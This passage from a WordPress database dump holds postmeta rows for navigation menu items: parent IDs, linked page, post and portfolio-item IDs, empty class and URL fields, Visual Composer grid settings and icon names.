0:\"\";}'),(57738,4526,'_menu_item_xfn',''),(57739,4526,'_menu_item_url',''),(57740,4526,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57741,4526,'_menu_item_icon','null'),(57742,4527,'_menu_item_type','post_type'),(57743,4527,'_menu_item_menu_item_parent','4349'),(57744,4527,'_menu_item_object_id','3048'),(57745,4527,'_menu_item_object','page'),(57746,4527,'_menu_item_target',''),(57747,4527,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57748,4527,'_menu_item_xfn',''),(57749,4527,'_menu_item_url',''),(57750,4527,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57751,4527,'_menu_item_icon','null'),(57752,4528,'_menu_item_type','post_type'),(57753,4528,'_menu_item_menu_item_parent','4349'),(57754,4528,'_menu_item_object_id','3058'),(57755,4528,'_menu_item_object','page'),(57756,4528,'_menu_item_target',''),(57757,4528,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57758,4528,'_menu_item_xfn',''),(57759,4528,'_menu_item_url',''),(57760,4528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57761,4528,'_menu_item_icon','null'),(57762,4529,'_menu_item_type','post_type'),(57763,4529,'_menu_item_menu_item_parent','4349'),(57764,4529,'_menu_item_object_id','4035'),(57765,4529,'_menu_item_object','page'),(57766,4529,'_menu_item_target',''),(57767,4529,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57768,4529,'_menu_item_xfn',''),(57769,4529,'_menu_item_url',''),(57770,4529,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57771,4529,'_menu_item_icon','null'),(57772,4530,'_menu_item_type','post_type'),(57773,4530,'_menu_item_menu_item_parent','4349'),(57774,4530,'_menu_item_object_id','3057'),(57775,4530,'_menu_item_object','page'),(57776,4530,'_menu_item_target',''),(57777,4530,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57778,4530,'_menu_item_xfn',''),(57779,4530,'_menu_item_url',''),(57780,4530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57781,4530,'_menu_item_icon','null'),(57782,4531,'_menu_item_type','post_type'),(57783,4531,'_menu_item_menu_item_parent','4349'),(57784,4531,'_menu_item_object_id','3050'),(57785,4531,'_menu_item_object','page'),(57786,4531,'_menu_item_target',''),(57787,4531,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57788,4531,'_menu_item_xfn',''),(57789,4531,'_menu_item_url',''),(57790,4531,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57791,4531,'_menu_item_icon','null'),(57792,4532,'_menu_item_type','post_type'),(57793,4532,'_menu_item_menu_item_parent','4379'),(57794,4532,'_menu_item_object_id','2019'),(57795,4532,'_menu_item_object','page'),(57796,4532,'_menu_item_target',''),(57797,4532,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57798,4532,'_menu_item_xfn',''),(57799,4532,'_menu_item_url',''),(57800,4532,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57801,4532,'_menu_item_icon','null'),(57802,4533,'_menu_item_type','post_type'),(57803,4533,'_menu_item_menu_item_parent','4383'),(57804,4533,'_menu_item_object_id','2019'),(57805,4533,'_menu_item_object','page'),(57806,4533,'_menu_item_target',''),(57807,4533,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57808,4533,'_menu_item_xfn',''),(57809,4533,'_menu_item_url',''),(57810,4533,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57811,4533,'_menu_item_icon','null'),(57812,4534,'_menu_item_type','post_type'),(57813,4534,'_menu_item_menu_item_parent','4384'),(57814,4534,'_menu_item_object_id','1948'),(57815,4534,'_menu_item_object','page'),(57816,4534,'_menu_item_target',''),(57817,4534,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57818,4534,'_menu_item_xfn',''),(57819,4534,'_menu_item_url',''),(57820,4534,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57821,4534,'_menu_item_icon','null'),(57822,4535,'_menu_item_type','post_type'),(57823,4535,'_menu_item_menu_item_parent','4380'),(57824,4535,'_menu_item_object_id','1948'),(57825,4535,'_menu_item_object','page'),(57826,4535,'_menu_item_target',''),(57827,4535,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57828,4535,'_menu_item_xfn',''),(57829,4535,'_menu_item_url',''),(57830,4535,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57831,4535,'_menu_item_icon','null'),(57832,4536,'_menu_item_type','post_type'),(57833,4536,'_menu_item_menu_item_parent','4377'),(57834,4536,'_menu_item_object_id','2174'),(57835,4536,'_menu_item_object','page'),(57836,4536,'_menu_item_target',''),(57837,4536,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57838,4536,'_menu_item_xfn',''),(57839,4536,'_menu_item_url',''),(57840,4536,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57841,4536,'_menu_item_icon','icon-star'),(57842,4536,'_menu_item_icon_pack','simple_line_icons'),(57843,4537,'_menu_item_type','post_type'),(57844,4537,'_menu_item_menu_item_parent','4381'),(57845,4537,'_menu_item_object_id','2174'),(57846,4537,'_menu_item_object','page'),(57847,4537,'_menu_item_target',''),(57848,4537,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57849,4537,'_menu_item_xfn',''),(57850,4537,'_menu_item_url',''),(57851,4537,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57852,4537,'_menu_item_icon','icon-star'),(57853,4537,'_menu_item_icon_pack','simple_line_icons'),(57854,4538,'_menu_item_type','post_type'),(57855,4538,'_menu_item_menu_item_parent','4358'),(57856,4538,'_menu_item_object_id','1679'),(57857,4538,'_menu_item_object','page'),(57858,4538,'_menu_item_target',''),(57859,4538,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57860,4538,'_menu_item_xfn',''),(57861,4538,'_menu_item_url',''),(57862,4538,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57863,4538,'_menu_item_icon','null'),(57864,4539,'_menu_item_type','post_type'),(57865,4539,'_menu_item_menu_item_parent','4386'),(57866,4539,'_menu_item_object_id','3770'),(57867,4539,'_menu_item_object','post'),(57868,4539,'_menu_item_target',''),(57869,4539,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57870,4539,'_menu_item_xfn',''),(57871,4539,'_menu_item_url',''),(57872,4539,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57873,4539,'_menu_item_icon','null'),(57874,4540,'_menu_item_type','post_type'),(57875,4540,'_menu_item_menu_item_parent','4386'),(57876,4540,'_menu_item_object_id','1685'),(57877,4540,'_menu_item_object','post'),(57878,4540,'_menu_item_target',''),(57879,4540,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57880,4540,'_menu_item_xfn',''),(57881,4540,'_menu_item_url',''),(57882,4540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57883,4540,'_menu_item_icon','null'),(57884,4541,'_menu_item_type','post_type'),(57885,4541,'_menu_item_menu_item_parent','4386'),(57886,4541,'_menu_item_object_id','1677'),(57887,4541,'_menu_item_object','post'),(57888,4541,'_menu_item_target',''),(57889,4541,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57890,4541,'_menu_item_xfn',''),(57891,4541,'_menu_item_url',''),(57892,4541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57893,4541,'_menu_item_icon','null'),(57894,4542,'_menu_item_type','post_type'),(57895,4542,'_menu_item_menu_item_parent','4386'),(57896,4542,'_menu_item_object_id','1671'),(57897,4542,'_menu_item_object','post'),(57898,4542,'_menu_item_target',''),(57899,4542,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57900,4542,'_menu_item_xfn',''),(57901,4542,'_menu_item_url',''),(57902,4542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57903,4542,'_menu_item_icon','null'),(57904,4543,'_menu_item_type','post_type'),(57905,4543,'_menu_item_menu_item_parent','4386'),(57906,4543,'_menu_item_object_id','1670'),(57907,4543,'_menu_item_object','post'),(57908,4543,'_menu_item_target',''),(57909,4543,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57910,4543,'_menu_item_xfn',''),(57911,4543,'_menu_item_url',''),(57912,4543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57913,4543,'_menu_item_icon','null'),(57914,4544,'_menu_item_type','post_type'),(57915,4544,'_menu_item_menu_item_parent','4386'),(57916,4544,'_menu_item_object_id','1681'),(57917,4544,'_menu_item_object','post'),(57918,4544,'_menu_item_target',''),(57919,4544,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57920,4544,'_menu_item_xfn',''),(57921,4544,'_menu_item_url',''),(57922,4544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57923,4544,'_menu_item_icon','null'),(57924,4545,'_menu_item_type','post_type'),(57925,4545,'_menu_item_menu_item_parent','4385'),(57926,4545,'_menu_item_object_id','3078'),(57927,4545,'_menu_item_object','portfolio-item'),(57928,4545,'_menu_item_target',''),(57929,4545,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57930,4545,'_menu_item_xfn',''),(57931,4545,'_menu_item_url',''),(57932,4545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57933,4545,'_menu_item_icon','null'),(57934,4546,'_menu_item_type','post_type'),(57935,4546,'_menu_item_menu_item_parent','4365'),(57936,4546,'_menu_item_object_id','3441'),(57937,4546,'_menu_item_object','page'),(57938,4546,'_menu_item_target',''),(57939,4546,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57940,4546,'_menu_item_xfn',''),(57941,4546,'_menu_item_url',''),(57942,4546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57943,4547,'_menu_item_type','post_type'),(57944,4547,'_menu_item_menu_item_parent','4388'),(57945,4547,'_menu_item_object_id','3075'),(57946,4547,'_menu_item_object','portfolio-item'),(57947,4547,'_menu_item_target',''),(57948,4547,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57949,4547,'_menu_item_xfn',''),(57950,4547,'_menu_item_url',''),(57951,4547,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57952,4547,'_menu_item_icon','null'),(57953,4548,'_menu_item_type','post_type'),(57954,4548,'_menu_item_menu_item_parent','4388'),(57955,4548,'_menu_item_object_id','3076'),(57956,4548,'_menu_item_object','portfolio-item'),(57957,4548,'_menu_item_target',''),(57958,4548,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57959,4548,'_menu_item_xfn',''),(57960,4548,'_menu_item_url',''),(57961,4548,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57962,4548,'_menu_item_icon','null'),(57963,4549,'_menu_item_type','post_type'),(57964,4549,'_menu_item_menu_item_parent','4388'),(57965,4549,'_menu_item_object_id','3077'),(57966,4549,'_menu_item_object','portfolio-item'),(57967,4549,'_menu_item_target',''),(57968,4549,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57969,4549,'_menu_item_xfn',''),(57970,4549,'_menu_item_url',''),(57971,4549,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57972,4549,'_menu_item_icon','null'),(57973,4550,'_menu_item_type','post_type'),(57974,4550,'_menu_item_menu_item_parent','4388'),(57975,4550,'_menu_item_object_id','3078'),(57976,4550,'_menu_item_object','portfolio-item'),(57977,4550,'_menu_item_target',''),(57978,4550,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57979,4550,'_menu_item_xfn',''),(57980,4550,'_menu_item_url',''),(57981,4550,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57982,4550,'_menu_item_icon','null'),(57983,4551,'_menu_item_type','post_type'),(57984,4551,'_menu_item_menu_item_parent','4388'),(57985,4551,'_menu_item_object_id','3098'),(57986,4551,'_menu_item_object','portfolio-item'),(57987,4551,'_menu_item_target',''),(57988,4551,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57989,4551,'_menu_item_xfn',''),(57990,4551,'_menu_item_url',''),(57991,4551,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57992,4551,'_menu_item_icon','null'),(57993,4552,'_menu_item_type','post_type'),(57994,4552,'_menu_item_menu_item_parent','4383'),(57995,4552,'_menu_item_object_id','2387'),(57996,4552,'_menu_item_object','page'),(57997,4552,'_menu_item_target',''),(57998,4552,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57999,4552,'_menu_item_xfn',''),(58000,4552,'_menu_item_url',''),(58001,4552,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58002,4552,'_menu_item_icon','null'),(58003,4553,'_menu_item_type','post_type'),(58004,4553,'_menu_item_menu_item_parent','4379'),(58005,4553,'_menu_item_object_id','2387'),(58006,4553,'_menu_item_object','page'),(58007,4553,'_menu_item_target',''),(58008,4553,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58009,4553,'_menu_item_xfn',''),(58010,4553,'_menu_item_url',''),(58011,4553,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58012,4553,'_menu_item_icon','null'),(58013,4554,'_menu_item_type','post_type'),(58014,4554,'_menu_item_menu_item_parent','4391'),(58015,4554,'_menu_item_object_id','3075'),(58016,4554,'_menu_item_object','portfolio-item'),(58017,4554,'_menu_item_target',''),(58018,4554,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58019,4554,'_menu_item_xfn',''),(58020,4554,'_menu_item_url',''),(58021,4554,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58022,4555,'_menu_item_type','post_type'),(58023,4555,'_menu_item_menu_item_parent','4358'),(58024,4555,'_menu_item_object_id','2421'),(58025,4555,'_menu_item_object','page'),(58026,4555,'_menu_item_target',''),(58027,4555,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58028,4555,'_menu_item_xfn',''),(58029,4555,'_menu_item_url',''),(58030,4555,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58031,4555,'_menu_item_icon','null'),(58032,4556,'_menu_item_type','post_type'),(58033,4556,'_menu_item_menu_item_parent','4358'),(58034,4556,'_menu_item_object_id','2419'),(58035,4556,'_menu_item_object','page'),(58036,4556,'_menu_item_target',''),(58037,4556,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58038,4556,'_menu_item_xfn',''),(58039,4556,'_menu_item_url',''),(58040,4556,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58041,4556,'_menu_item_icon','null'),(58042,4557,'_menu_item_type','post_type'),(58043,4557,'_menu_item_menu_item_parent','4350'),(58044,4557,'_menu_item_object_id','2421'),(58045,4557,'_menu_item_object','page'),(58046,4557,'_menu_item_target',''),(58047,4557,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58048,4557,'_menu_item_xfn',''),(58049,4557,'_menu_item_url',''),(58050,4557,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58051,4557,'_menu_item_icon','null'),(58052,4558,'_menu_item_type','post_type'),(58053,4558,'_menu_item_menu_item_parent','4350'),(58054,4558,'_menu_item_object_id','2419'),(58055,4558,'_menu_item_object','page'),(58056,4558,'_menu_item_target',''),(58057,4558,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58058,4558,'_menu_item_xfn',''),(58059,4558,'_menu_item_url',''),(58060,4558,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58061,4558,'_menu_item_icon','null'),(58062,4559,'_menu_item_type','post_type'),(58063,4559,'_menu_item_menu_item_parent','4352'),(58064,4559,'_menu_item_object_id','2435'),(58065,4559,'_menu_item_object','page'),(58066,4559,'_menu_item_target',''),(58067,4559,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58068,4559,'_menu_item_xfn',''),(58069,4559,'_menu_item_url',''),(58070,4559,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58071,4559,'_menu_item_icon','null'),(58072,4560,'_menu_item_type','post_type'),(58073,4560,'_menu_item_menu_item_parent','4356'),(58074,4560,'_menu_item_object_id','2435'),(58075,4560,'_menu_item_object','page'),(58076,4560,'_menu_item_target',''),(58077,4560,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58078,4560,'_menu_item_xfn',''),(58079,4560,'_menu_item_url',''),(58080,4560,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58081,4560,'_menu_item_icon','null'),(58082,4561,'_menu_item_type','post_type'),(58083,4561,'_menu_item_menu_item_parent','4391'),(58084,4561,'_menu_item_object_id','2435'),(58085,4561,'_menu_item_object','page'),(58086,4561,'_menu_item_target',''),(58087,4561,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58088,4561,'_menu_item_xfn',''),(58089,4561,'_menu_item_url',''),(58090,4561,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58091,4562,'_menu_item_type','post_type'),(58092,4562,'_menu_item_menu_item_parent','4390'),(58093,4562,'_menu_item_object_id','1811'),(58094,4562,'_menu_item_object','page'),(58095,4562,'_menu_item_target',''),(58096,4562,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58097,4562,'_menu_item_xfn',''),(58098,4562,'_menu_item_url',''),(58099,4562,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58100,4562,'_menu_item_icon','null'),(58101,4563,'_menu_item_type','post_type'),(58102,4563,'_menu_item_menu_item_parent','4390'),(58103,4563,'_menu_item_object_id','1819'),(58104,4563,'_menu_item_object','page'),(58105,4563,'_menu_item_target',''),(58106,4563,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58107,4563,'_menu_item_xfn',''),(58108,4563,'_menu_item_url',''),(58109,4563,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58110,4563,'_menu_item_icon','null'),(58111,4564,'_menu_item_type','post_type'),(58112,4564,'_menu_item_menu_item_parent','4390'),(58113,4564,'_menu_item_object_id','1805'),(58114,4564,'_menu_item_object','page'),(58115,4564,'_menu_item_target',''),(58116,4564,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58117,4564,'_menu_item_xfn',''),(58118,4564,'_menu_item_url',''),(58119,4564,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58120,4564,'_menu_item_icon','null'),(58121,4565,'_menu_item_type','post_type'),(58122,4565,'_menu_item_menu_item_parent','4390'),(58123,4565,'_menu_item_object_id','2448'),(58124,4565,'_menu_item_object','page'),(58125,4565,'_menu_item_target',''),(58126,4565,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58127,4565,'_menu_item_xfn',''),(58128,4565,'_menu_item_url',''),(58129,4565,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58130,4565,'_menu_item_icon','null'),(58131,4566,'_menu_item_type','post_type'),(58132,4566,'_menu_item_menu_item_parent','4393'),(58133,4566,'_menu_item_object_id','2448'),(58134,4566,'_menu_item_object','page'),(58135,4566,'_menu_item_target',''),(58136,4566,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58137,4566,'_menu_item_xfn',''),(58138,4566,'_menu_item_url',''),(58139,4566,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58140,4566,'_menu_item_icon','null'),(58141,4567,'_menu_item_type','post_type'),(58142,4567,'_menu_item_menu_item_parent','4393'),(58143,4567,'_menu_item_object_id','1811'),(58144,4567,'_menu_item_object','page'),(58145,4567,'_menu_item_target',''),(58146,4567,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58147,4567,'_menu_item_xfn',''),(58148,4567,'_menu_item_url',''),(58149,4567,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58150,4567,'_menu_item_icon','null'),(58151,4568,'_menu_item_type','post_type'),(58152,4568,'_menu_item_menu_item_parent','4393'),(58153,4568,'_menu_item_object_id','1819'),(58154,4568,'_menu_item_object','page'),(58155,4568,'_menu_item_target',''),(58156,4568,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58157,4568,'_menu_item_xfn',''),(58158,4568,'_menu_item_url',''),(58159,4568,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58160,4568,'_menu_item_icon','null'),(58161,4569,'_menu_item_type','post_type'),(58162,4569,'_menu_item_menu_item_parent','4393'),(58163,4569,'_menu_item_object_id','1805'),(58164,4569,'_menu_item_object','page'),(58165,4569,'_menu_item_target',''),(58166,4569,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58167,4569,'_menu_item_xfn',''),(58168,4569,'_menu_item_url',''),(58169,4569,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58170,4569,'_menu_item_icon','null'),(58171,4570,'_menu_item_type','post_type'),(58172,4570,'_menu_item_menu_item_parent','4392'),(58173,4570,'_menu_item_object_id','2457'),(58174,4570,'_menu_item_object','page'),(58175,4570,'_menu_item_target',''),(58176,4570,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58177,4570,'_menu_item_xfn',''),(58178,4570,'_menu_item_url',''),(58179,4570,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58180,4570,'_menu_item_icon','null'),(58181,4571,'_menu_item_type','post_type'),(58182,4571,'_menu_item_menu_item_parent','4389'),(58183,4571,'_menu_item_object_id','2457'),(58184,4571,'_menu_item_object','page'),(58185,4571,'_menu_item_target',''),(58186,4571,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58187,4571,'_menu_item_xfn',''),(58188,4571,'_menu_item_url',''),(58189,4571,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58190,4571,'_menu_item_icon','null'),(58191,4572,'_menu_item_type','post_type'),(58192,4572,'_menu_item_menu_item_parent','4377'),(58193,4572,'_menu_item_object_id','2477'),(58194,4572,'_menu_item_object','page'),(58195,4572,'_menu_item_target',''),(58196,4572,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58197,4572,'_menu_item_xfn',''),(58198,4572,'_menu_item_url',''),(58199,4572,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58200,4572,'_menu_item_icon','icon-star'),(58201,4572,'_menu_item_icon_pack','simple_line_icons'),(58202,4573,'_menu_item_type','post_type'),(58203,4573,'_menu_item_menu_item_parent','4381'),(58204,4573,'_menu_item_object_id','2477'),(58205,4573,'_menu_item_object','page'),(58206,4573,'_menu_item_target',''),(58207,4573,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58208,4573,'_menu_item_xfn',''),(58209,4573,'_menu_item_url',''),(58210,4573,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58211,4573,'_menu_item_icon','icon-star'),(58212,4573,'_menu_item_icon_pack','simple_line_icons'),(58213,4574,'_menu_item_type','post_type'),(58214,4574,'_menu_item_menu_item_parent','4382'),(58215,4574,'_menu_item_object_id','2494'),(58216,4574,'_menu_item_object','page'),(58217,4574,'_menu_item_target',''),(58218,4574,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58219,4574,'_menu_item_xfn',''),(58220,4574,'_menu_item_url',''),(58221,4574,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58222,4574,'_menu_item_icon','icon-star'),(58223,4574,'_menu_item_icon_pack','simple_line_icons'),(58224,4575,'_menu_item_type','post_type'),(58225,4575,'_menu_item_menu_item_parent','4382'),(58226,4575,'_menu_item_object_id','2472'),(58227,4575,'_menu_item_object','page'),(58228,4575,'_menu_item_target',''),(58229,4575,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58230,4575,'_menu_item_xfn',''),(58231,4575,'_menu_item_url',''),(58232,4575,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58233,4575,'_menu_item_icon','icon-star'),(58234,4575,'_menu_item_icon_pack','simple_line_icons'),(58235,4576,'_menu_item_type','post_type'),(58236,4576,'_menu_item_menu_item_parent','4378'),(58237,4576,'_menu_item_object_id','2494'),(58238,4576,'_menu_item_object','page'),(58239,4576,'_menu_item_target',''),(58240,4576,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58241,4576,'_menu_item_xfn',''),(58242,4576,'_menu_item_url',''),(58243,4576,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58244,4576,'_menu_item_icon','icon-star'),(58245,4576,'_menu_item_icon_pack','simple_line_icons'),(58246,4577,'_menu_item_type','post_type'),(58247,4577,'_menu_item_menu_item_parent','4378'),(58248,4577,'_menu_item_object_id','2472'),(58249,4577,'_menu_item_object','page'),(58250,4577,'_menu_item_target',''),(58251,4577,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58252,4577,'_menu_item_xfn',''),(58253,4577,'_menu_item_url',''),(58254,4577,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58255,4577,'_menu_item_icon','icon-star'),(58256,4577,'_menu_item_icon_pack','simple_line_icons'),(58257,4578,'_menu_item_type','post_type'),(58258,4578,'_menu_item_menu_item_parent','4352'),(58259,4578,'_menu_item_object_id','2627'),(58260,4578,'_menu_item_object','page'),(58261,4578,'_menu_item_target',''),(58262,4578,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58263,4578,'_menu_item_xfn',''),(58264,4578,'_menu_item_url',''),(58265,4578,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58266,4578,'_menu_item_icon','null'),(58267,4579,'_menu_item_type','post_type'),(58268,4579,'_menu_item_menu_item_parent','4352'),(58269,4579,'_menu_item_object_id','2625'),(58270,4579,'_menu_item_object','page'),(58271,4579,'_menu_item_target',''),(58272,4579,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58273,4579,'_menu_item_xfn',''),(58274,4579,'_menu_item_url',''),(58275,4579,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58276,4579,'_menu_item_icon','null'),(58277,4580,'_menu_item_type','post_type'),(58278,4580,'_menu_item_menu_item_parent','4391'),(58279,4580,'_menu_item_object_id','2627'),(58280,4580,'_menu_item_object','page'),(58281,4580,'_menu_item_target',''),(58282,4580,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58283,4580,'_menu_item_xfn',''),(58284,4580,'_menu_item_url',''),(58285,4580,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58286,4581,'_menu_item_type','post_type'),(58287,4581,'_menu_item_menu_item_parent','4391'),(58288,4581,'_menu_item_object_id','2625'),(58289,4581,'_menu_item_object','page'),(58290,4581,'_menu_item_target',''),(58291,4581,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58292,4581,'_menu_item_xfn',''),(58293,4581,'_menu_item_url',''),(58294,4581,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58295,4582,'_menu_item_type','post_type'),(58296,4582,'_menu_item_menu_item_parent','4356'),(58297,4582,'_menu_item_object_id','2627'),(58298,4582,'_menu_item_object','page'),(58299,4582,'_menu_item_target',''),(58300,4582,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58301,4582,'_menu_item_xfn',''),(58302,4582,'_menu_item_url',''),(58303,4582,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58304,4583,'_menu_item_type','post_type'),(58305,4583,'_menu_item_menu_item_parent','4356'),(58306,4583,'_menu_item_object_id','2625'),(58307,4583,'_menu_item_object','page'),(58308,4583,'_menu_item_target',''),(58309,4583,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58310,4583,'_menu_item_xfn',''),(58311,4583,'_menu_item_url',''),(58312,4583,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58313,4583,'_menu_item_icon','null'),(58314,4584,'_menu_item_type','post_type'),(58315,4584,'_menu_item_menu_item_parent','4392'),(58316,4584,'_menu_item_object_id','3065'),(58317,4584,'_menu_item_object','page'),(58318,4584,'_menu_item_target',''),(58319,4584,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58320,4584,'_menu_item_xfn',''),(58321,4584,'_menu_item_url',''),(58322,4584,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58323,4584,'_menu_item_icon','null'),(58324,4585,'_menu_item_type','post_type'),(58325,4585,'_menu_item_menu_item_parent','4392'),(58326,4585,'_menu_item_object_id','3067'),(58327,4585,'_menu_item_object','page'),(58328,4585,'_menu_item_target',''),(58329,4585,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(58330,4585,'_menu_item_xfn',''),(58331,4585,'_menu_item_url',''),(58332,4585,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(58333,4585,'_menu_item_icon','null'),(58334,4586,'_menu_item_type','post_type'),(58335,4586,'_menu_item_menu_item_parent','4392'),(58336,4586,'_menu_item_object_id','3066'),(58337,4586,'_menu_item_object','page'),(58338,4586,'_menu_item_target',''),(58339,4586,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),